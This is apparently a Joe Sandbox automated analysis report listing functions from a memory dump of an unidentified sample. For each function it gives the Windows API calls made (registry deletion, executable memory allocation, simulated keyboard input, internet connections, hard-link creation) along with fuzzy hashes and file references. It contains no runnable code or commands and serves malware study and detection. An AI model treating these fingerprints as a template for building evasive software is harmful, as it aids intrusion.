Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 5a99bb091eb72880e54990208997248788a7d1cf67e1a65295225e958dcb62eb
Instruction ID: 353d5eed32cf5cdbdc4880eb610933cfc99a4d5f40e752d098cce012e98abe1b
Opcode Fuzzy Hash: 5a99bb091eb72880e54990208997248788a7d1cf67e1a65295225e958dcb62eb
Instruction Fuzzy Hash: 37D0A734904322BFD7301F35FC0878137D4EF04304F08841AE486F1651D670D8888720

Function 00DF3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00DF3AC2,?,00DF3CF7), ref: 00DF3ADA
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DF3AEC

Strings

RegDeleteKeyExW, xrefs: 00DF3AE6
advapi32.dll, xrefs: 00DF3AD5

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 77fb73edff30a9dc58d853bd0c67cf01f609e553c491b22e2e1cd56d0d282e41
Instruction ID: 1e57563bdfe69d3cba73c890f4056606a7de066405c29a8caa311e855dd3e313
Opcode Fuzzy Hash: 77fb73edff30a9dc58d853bd0c67cf01f609e553c491b22e2e1cd56d0d282e41
Instruction Fuzzy Hash: 77D0A7706453139FD7208F32FC0E79137D4AB11304B06D419E5D6F1190EFF0C4808620

Function 00D9AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00DE6AA6), ref: 00D9AB2D
_wcscmp.LIBCMT ref: 00D9AB49

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharUpper_wcscmp
String ID:
API String ID: 820872866-0
Opcode ID: 2475afb860887f438c377c253b232c3fb72eca1633cc435f4b027c9206e3d99d
Instruction ID: 03a854836a85cfbbb00c0704b4702c51c83129ea98029ed1cbf190f0ba40668d
Opcode Fuzzy Hash: 2475afb860887f438c377c253b232c3fb72eca1633cc435f4b027c9206e3d99d
Instruction Fuzzy Hash: F0A10376B0010ADBDF14DF69E9816ADBBB1FF44300F65456AE84697290EB30D8A1C7A2

Function 00DF0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00DF0D85
CharLowerBuffW.USER32(?,?), ref: 00DF0DC8

Part of subcall function 00DF0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00DF0478

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00DF0FB2
_memmove.LIBCMT ref: 00DF0FC2

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: e6767e4875f01004a772b4e254ec49e7556fec40c37a11113bd9e306c8f624c2
Instruction ID: f841355e4fb55b2c1e1059a0a6ee65fae36502957835b026eb6cfba0289c5c9d
Opcode Fuzzy Hash: e6767e4875f01004a772b4e254ec49e7556fec40c37a11113bd9e306c8f624c2
Instruction Fuzzy Hash: 1AB19D716043048FC714DF28C88096ABBE4EF89714F19896EF989DB352DB31ED45CBA1

Function 00DEAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00DEAF56
CoUninitialize.COMBASE ref: 00DEAF61

Part of subcall function 00DD1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DD10B8

VariantInit.OLEAUT32(?), ref: 00DEAF6C
VariantClear.OLEAUT32(?), ref: 00DEB23F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 0dc6fad31736256ed4b91f196ddd0bf2943212fa66a427be34172ccd2c5d4fb4
Instruction ID: d138e4e9beac960602d5c6cba71d4caf9c454358333f0265561be37c884caad8
Opcode Fuzzy Hash: 0dc6fad31736256ed4b91f196ddd0bf2943212fa66a427be34172ccd2c5d4fb4
Instruction Fuzzy Hash: 4EA126356047419FCB10EF15C891A2AB7E5FF89760F048459FA96AB3A1DB30FD44CBA2

Function 00D9C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00D9C419
ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00DD6653,?,?,00000000), ref: 00D9C495

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: FileRead_memmove
String ID:
API String ID: 1325644223-0
Opcode ID: d049aeb6f7d6f086feac4a3ac39298e807bfa5cd15e1cac3a55457f0852835f4
Instruction ID: bbafa61695e61f72c4d58a14362e153ca29a85d4465f963dca5c8702cea42905
Opcode Fuzzy Hash: d049aeb6f7d6f086feac4a3ac39298e807bfa5cd15e1cac3a55457f0852835f4
Instruction Fuzzy Hash: A8A1BDB0A04609EBDF04CF69C984BA9FBB0FF05300F14D599E865AB291D735E961CBB1

Function 00DB42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DB4347
_memcpy_s.LIBCMT ref: 00DB43B9
__filbuf.LIBCMT ref: 00DB443A
_memset.LIBCMT ref: 00DB447E

Part of subcall function 00DB889E: __getptd_noexit.LIBCMT ref: 00DB889E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction ID: 4463a8c88d49b954bc7cac2a9a3c86b55ceac119b253dbeebb602866f12cca91
Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction Fuzzy Hash: 54516F30A00205DBDB24DFA988806EE77E5EF41320F2C8729F867962D2D7B0DD619B70

Function 00DFC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DFC354
ScreenToClient.USER32(?,00000002), ref: 00DFC384
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00DFC3EA

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: c1b71e347a8938a8f017b6364fc80494c9db405592f603554fa052068c4370f6
Instruction ID: 0ef9c247b73c166b359fa585ca071370945c052ba37d58b4a8c1c53fa926b8a3
Opcode Fuzzy Hash: c1b71e347a8938a8f017b6364fc80494c9db405592f603554fa052068c4370f6
Instruction Fuzzy Hash: 47518E3091020CEFCF24CF68C980ABE7BA6FB45360F25C559EA159B290D730ED51CBA0

Function 00DCD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00DCD258
__itow.LIBCMT ref: 00DCD292

Part of subcall function 00DCD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00DCD549

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00DCD2FB
__itow.LIBCMT ref: 00DCD350

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 891f623ebf1a0b7e2da82d4dc6a7adb614dbcf72be168464ab3692a24dc90a2a
Instruction ID: d8e3ef67bee91b178077301a8d71362c9886d729a4fbfc405fc0c198144c6247
Opcode Fuzzy Hash: 891f623ebf1a0b7e2da82d4dc6a7adb614dbcf72be168464ab3692a24dc90a2a
Instruction Fuzzy Hash: 4C417271A0020AABDF15DF54DC52FEE7BBAEF49700F040029FA06A7191DB749A45CB76

Function 00DDEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DDEF32
GetLastError.KERNEL32(?,00000000), ref: 00DDEF58
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DDEF7D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DDEFA9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: da645a77dcb1a69514fbe4afef59c0edff38d1370482c35d4d4047ae39660bf4
Instruction ID: 5527a3ab3ac731190697751e10d078ac928a4ae818a43eae51e9e20cf3e5b29c
Opcode Fuzzy Hash: da645a77dcb1a69514fbe4afef59c0edff38d1370482c35d4d4047ae39660bf4
Instruction Fuzzy Hash: 1C412939600611DFCF10EF15C984A59BBE6EF89720B198489E846AF362CB34FD40DBA1

Function 00DFB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DFB3E1

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 29faa5425427859b47dc6f8ae8782199ccaf31e8a6d5d042a9a2135ac351cd6b
Instruction ID: b4521078a045ea1c9e05e4f228b50dd96a9d4d4e6d7bab56c6179b33a1ccb3b3
Opcode Fuzzy Hash: 29faa5425427859b47dc6f8ae8782199ccaf31e8a6d5d042a9a2135ac351cd6b
Instruction Fuzzy Hash: 48318E3464420CAFEF249E58DD85BB837A5EB05374F2AC513FB91E62A2C730E9449A71

Function 00DFD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00DFD617
GetWindowRect.USER32(?,?), ref: 00DFD68D
PtInRect.USER32(?,?,00DFEB2C), ref: 00DFD69D
MessageBeep.USER32(00000000), ref: 00DFD70E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: cdc99622e39171d8b0fb202852344beba14b24dd89bd603f643218e2170a1ea2
Instruction ID: d120e844e4e67d0ee7ea56d36469f38b2841aa91eebae1c4596b0fef39a8289e
Opcode Fuzzy Hash: cdc99622e39171d8b0fb202852344beba14b24dd89bd603f643218e2170a1ea2
Instruction Fuzzy Hash: 94415A30A0021CEFCB15DF59D884BA97BF7BB45311F1A81AAE61AEF251D730E845CB60

Function 00DD4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00DD44EE
SetKeyboardState.USER32(00000080,?,00008000), ref: 00DD450A
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00DD456A
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00DD45C8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a2dc123b412e84f0ff6bc98b323b802d1faaa1ab83a8a8adba645b56cd572e14
Instruction ID: 3d022cb2e99c0a161073e539d8431635d3c79176871bb71fa804ecb4c51e4b71
Opcode Fuzzy Hash: a2dc123b412e84f0ff6bc98b323b802d1faaa1ab83a8a8adba645b56cd572e14
Instruction Fuzzy Hash: 4831E4B1A04298AFEF248B64A8087FE7BB59B49314F08425BF4C2923C1C774DA48D772

Function 00DC4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DC4DE8
__isleadbyte_l.LIBCMT ref: 00DC4E16
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DC4E44
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DC4E7A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 0407b513143cb9774d880c8a2ef35625d389f438e5d8567b0c33fe2d9dc08918
Instruction ID: 56ea1bfe9f7d5fa5ceeb6af692556a258be6dda1fb145e40d0f4edd1dcecac54
Opcode Fuzzy Hash: 0407b513143cb9774d880c8a2ef35625d389f438e5d8567b0c33fe2d9dc08918
Instruction Fuzzy Hash: 07318C31600256AFDF219F75C855FAA7BAAFF41320F1A852DF862971A0E730D851DBB0

Function 00DF7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00DF7AB6

Part of subcall function 00DD69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DD69E3
Part of subcall function 00DD69C9: GetCurrentThreadId.KERNEL32 ref: 00DD69EA
Part of subcall function 00DD69C9: AttachThreadInput.USER32(00000000,?,00DD8127), ref: 00DD69F1

GetCaretPos.USER32(?), ref: 00DF7AC7
ClientToScreen.USER32(00000000,?), ref: 00DF7B00
GetForegroundWindow.USER32 ref: 00DF7B06

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 0e209434847bf09ac459d13b4b7a474d9618f08e93a9fcc4cf5ac8050d21f8ec
Instruction ID: ad8d35724589af2261aff2c4253697848bce383944bf021a39e053ad684b1526
Opcode Fuzzy Hash: 0e209434847bf09ac459d13b4b7a474d9618f08e93a9fcc4cf5ac8050d21f8ec
Instruction Fuzzy Hash: 8C31ED71D00108AFCB00EFBADC859EFBBF9EF59314B11846AE815E7211E6359E058BB1

Function 00DE497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DE49B7

Part of subcall function 00DE4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DE4A60
Part of subcall function 00DE4A41: InternetCloseHandle.WININET(00000000), ref: 00DE4AFD

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 4abf74f34eb397826a3098bf09b49cabcb53703ef8795ccdff30d6bcaab3db6b
Instruction ID: 79c176a2801b4d68492f994ba47a23fe2e60ce530e7e9f4778a178ced1581d93
Opcode Fuzzy Hash: 4abf74f34eb397826a3098bf09b49cabcb53703ef8795ccdff30d6bcaab3db6b
Instruction Fuzzy Hash: 91212631244A41BFDB12AF62CC00FBBB7A9FF48714F04402EFA4596551EB31D820ABB4

Function 00DCBC90 Relevance: 6.1, APIs: 4, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DCBCD9
